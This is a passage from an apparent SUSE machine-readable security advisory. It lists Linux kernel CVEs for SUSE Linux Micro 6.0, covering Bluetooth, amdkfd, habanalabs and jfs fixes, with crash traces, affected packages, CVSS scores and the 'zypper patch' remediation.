"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40307"
},
{
"cve": "CVE-2025-40308",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40308"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: bcsp: receive data only if registered\n\nCurrently, bcsp_recv() can be called even when the BCSP protocol has not\nbeen registered. This leads to a NULL pointer dereference, as shown in\nthe following stack trace:\n\n KASAN: null-ptr-deref in range [0x0000000000000108-0x000000000000010f]\n RIP: 0010:bcsp_recv+0x13d/0x1740 drivers/bluetooth/hci_bcsp.c:590\n Call Trace:\n \u003cTASK\u003e\n hci_uart_tty_receive+0x194/0x220 drivers/bluetooth/hci_ldisc.c:627\n tiocsti+0x23c/0x2c0 drivers/tty/tty_io.c:2290\n tty_ioctl+0x626/0xde0 drivers/tty/tty_io.c:2706\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:907 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nTo prevent this, ensure that the HCI_UART_REGISTERED flag is set before\nprocessing received data. If the protocol is not registered, return\n-EUNATCH.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40308",
"url": "https://www.suse.com/security/cve/CVE-2025-40308"
},
{
"category": "external",
"summary": "SUSE Bug 1255064 for CVE-2025-40308",
"url": "https://bugzilla.suse.com/1255064"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40308"
},
{
"cve": "CVE-2025-40309",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40309"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: SCO: Fix UAF on sco_conn_free\n\nBUG: KASAN: slab-use-after-free in sco_conn_free net/bluetooth/sco.c:87 [inline]\nBUG: KASAN: slab-use-after-free in kref_put include/linux/kref.h:65 [inline]\nBUG: KASAN: slab-use-after-free in sco_conn_put+0xdd/0x410\nnet/bluetooth/sco.c:107\nWrite of size 8 at addr ffff88811cb96b50 by task kworker/u17:4/352\n\nCPU: 1 UID: 0 PID: 352 Comm: kworker/u17:4 Not tainted\n6.17.0-rc5-g717368f83676 #4 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nWorkqueue: hci13 hci_cmd_sync_work\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x10b/0x170 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0x191/0x550 mm/kasan/report.c:482\n kasan_report+0xc4/0x100 mm/kasan/report.c:595\n sco_conn_free net/bluetooth/sco.c:87 [inline]\n kref_put include/linux/kref.h:65 [inline]\n sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107\n sco_connect_cfm+0xb4/0xae0 net/bluetooth/sco.c:1441\n hci_connect_cfm include/net/bluetooth/hci_core.h:2082 [inline]\n hci_conn_failed+0x20a/0x2e0 net/bluetooth/hci_conn.c:1313\n hci_conn_unlink+0x55f/0x810 net/bluetooth/hci_conn.c:1121\n hci_conn_del+0xb6/0x1110 net/bluetooth/hci_conn.c:1147\n hci_abort_conn_sync+0x8c5/0xbb0 net/bluetooth/hci_sync.c:5689\n hci_cmd_sync_work+0x281/0x380 net/bluetooth/hci_sync.c:332\n process_one_work kernel/workqueue.c:3236 [inline]\n process_scheduled_works+0x77e/0x1040 kernel/workqueue.c:3319\n worker_thread+0xbee/0x1200 kernel/workqueue.c:3400\n kthread+0x3c7/0x870 kernel/kthread.c:463\n ret_from_fork+0x13a/0x1e0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 31370:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x30/0x70 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:388 [inline]\n __kasan_kmalloc+0x82/0x90 mm/kasan/common.c:405\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __do_kmalloc_node mm/slub.c:4382 [inline]\n __kmalloc_noprof+0x22f/0x390 mm/slub.c:4394\n kmalloc_noprof include/linux/slab.h:909 [inline]\n sk_prot_alloc+0xae/0x220 net/core/sock.c:2239\n sk_alloc+0x34/0x5a0 net/core/sock.c:2295\n bt_sock_alloc+0x3c/0x330 net/bluetooth/af_bluetooth.c:151\n sco_sock_alloc net/bluetooth/sco.c:562 [inline]\n sco_sock_create+0xc0/0x350 net/bluetooth/sco.c:593\n bt_sock_create+0x161/0x3b0 net/bluetooth/af_bluetooth.c:135\n __sock_create+0x3ad/0x780 net/socket.c:1589\n sock_create net/socket.c:1647 [inline]\n __sys_socket_create net/socket.c:1684 [inline]\n __sys_socket+0xd5/0x330 net/socket.c:1731\n __do_sys_socket net/socket.c:1745 [inline]\n __se_sys_socket net/socket.c:1743 [inline]\n __x64_sys_socket+0x7a/0x90 net/socket.c:1743\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xc7/0x240 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 31374:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x30/0x70 mm/kasan/common.c:68\n kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:576\n poison_slab_object mm/kasan/common.c:243 [inline]\n __kasan_slab_free+0x3d/0x50 mm/kasan/common.c:275\n kasan_slab_free include/linux/kasan.h:233 [inline]\n slab_free_hook mm/slub.c:2428 [inline]\n slab_free mm/slub.c:4701 [inline]\n kfree+0x199/0x3b0 mm/slub.c:4900\n sk_prot_free net/core/sock.c:2278 [inline]\n __sk_destruct+0x4aa/0x630 net/core/sock.c:2373\n sco_sock_release+0x2ad/0x300 net/bluetooth/sco.c:1333\n __sock_release net/socket.c:649 [inline]\n sock_close+0xb8/0x230 net/socket.c:1439\n __fput+0x3d1/0x9e0 fs/file_table.c:468\n task_work_run+0x206/0x2a0 kernel/task_work.c:227\n get_signal+0x1201/0x1410 kernel/signal.c:2807\n arch_do_signal_or_restart+0x34/0x740 arch/x86/kernel/signal.c:337\n exit_to_user_mode_loop+0x68/0xc0 kernel/entry/common.c:40\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n s\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40309",
"url": "https://www.suse.com/security/cve/CVE-2025-40309"
},
{
"category": "external",
"summary": "SUSE Bug 1255065 for CVE-2025-40309",
"url": "https://bugzilla.suse.com/1255065"
},
{
"category": "external",
"summary": "SUSE Bug 1255066 for CVE-2025-40309",
"url": "https://bugzilla.suse.com/1255066"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40309"
},
{
"cve": "CVE-2025-40310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40310"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: resolve a race in amdgpu_amdkfd_device_fini_sw\n\nThere is race in amdgpu_amdkfd_device_fini_sw and interrupt.\nif amdgpu_amdkfd_device_fini_sw run in b/w kfd_cleanup_nodes and\n kfree(kfd), and KGD interrupt generated.\n\nkernel panic log:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000098\namdgpu 0000:c8:00.0: amdgpu: Requesting 4 partitions through PSP\n\nPGD d78c68067 P4D d78c68067\n\nkfd kfd: amdgpu: Allocated 3969056 bytes on gart\n\nPUD 1465b8067 PMD @\n\nOops: @002 [#1] SMP NOPTI\n\nkfd kfd: amdgpu: Total number of KFD nodes to be created: 4\nCPU: 115 PID: @ Comm: swapper/115 Kdump: loaded Tainted: G S W OE K\n\nRIP: 0010:_raw_spin_lock_irqsave+0x12/0x40\n\nCode: 89 e@ 41 5c c3 cc cc cc cc 66 66 2e Of 1f 84 00 00 00 00 00 OF 1f 40 00 Of 1f 44% 00 00 41 54 9c 41 5c fa 31 cO ba 01 00 00 00 \u003cfO\u003e OF b1 17 75 Ba 4c 89 e@ 41 Sc\n\n89 c6 e8 07 38 5d\n\nRSP: 0018: ffffc90@1a6b0e28 EFLAGS: 00010046\n\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000018\n0000000000000001 RSI: ffff8883bb623e00 RDI: 0000000000000098\nffff8883bb000000 RO8: ffff888100055020 ROO: ffff888100055020\n0000000000000000 R11: 0000000000000000 R12: 0900000000000002\nffff888F2b97da0@ R14: @000000000000098 R15: ffff8883babdfo00\n\nCS: 010 DS: 0000 ES: 0000 CRO: 0000000080050033\n\nCR2: 0000000000000098 CR3: 0000000e7cae2006 CR4: 0000000002770ce0\n0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n0000000000000000 DR6: 00000000fffeO7FO DR7: 0000000000000400\n\nPKRU: 55555554\n\nCall Trace:\n\n\u003cIRQ\u003e\n\nkgd2kfd_interrupt+@x6b/0x1f@ [amdgpu]\n\n? amdgpu_fence_process+0xa4/0x150 [amdgpu]\n\nkfd kfd: amdgpu: Node: 0, interrupt_bitmap: 3 YcpxFl Rant tErace\n\namdgpu_irq_dispatch+0x165/0x210 [amdgpu]\n\namdgpu_ih_process+0x80/0x100 [amdgpu]\n\namdgpu: Virtual CRAT table created for GPU\n\namdgpu_irq_handler+0x1f/@x60 [amdgpu]\n\n__handle_irq_event_percpu+0x3d/0x170\n\namdgpu: Topology: Add dGPU node [0x74a2:0x1002]\n\nhandle_irq_event+0x5a/@xcO\n\nhandle_edge_irq+0x93/0x240\n\nkfd kfd: amdgpu: KFD node 1 partition @ size 49148M\n\nasm_call_irq_on_stack+0xf/@x20\n\n\u003c/IRQ\u003e\n\ncommon_interrupt+0xb3/0x130\n\nasm_common_interrupt+0x1le/0x40\n\n5.10.134-010.a1i5000.a18.x86_64 #1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40310",
"url": "https://www.suse.com/security/cve/CVE-2025-40310"
},
{
"category": "external",
"summary": "SUSE Bug 1255041 for CVE-2025-40310",
"url": "https://bugzilla.suse.com/1255041"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40310"
},
{
"cve": "CVE-2025-40311",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40311"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/habanalabs: support mapping cb with vmalloc-backed coherent memory\n\nWhen IOMMU is enabled, dma_alloc_coherent() with GFP_USER may return\naddresses from the vmalloc range. If such an address is mapped without\nVM_MIXEDMAP, vm_insert_page() will trigger a BUG_ON due to the\nVM_PFNMAP restriction.\n\nFix this by checking for vmalloc addresses and setting VM_MIXEDMAP\nin the VMA before mapping. This ensures safe mapping and avoids kernel\ncrashes. The memory is still driver-allocated and cannot be accessed\ndirectly by userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40311",
"url": "https://www.suse.com/security/cve/CVE-2025-40311"
},
{
"category": "external",
"summary": "SUSE Bug 1255068 for CVE-2025-40311",
"url": "https://bugzilla.suse.com/1255068"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2025-40311"
},
{
"cve": "CVE-2025-40312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: Verify inode mode when loading from disk\n\nThe inode mode loaded from corrupted disk can be invalid. Do like what\ncommit 0a9e74051313 (\"isofs: Verify inode mode when loading from disk\")\ndoes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40312",
"url": "https://www.suse.com/security/cve/CVE-2025-40312"
},
{
"category": "external",
"summary": "SUSE Bug 1255046 for CVE-2025-40312",
"url": "https://bugzilla.suse.com/1255046"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40312"
},
{
"cve": "CVE-2025-40314",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40314"
}
],
"notes": [
{
"category": "general",
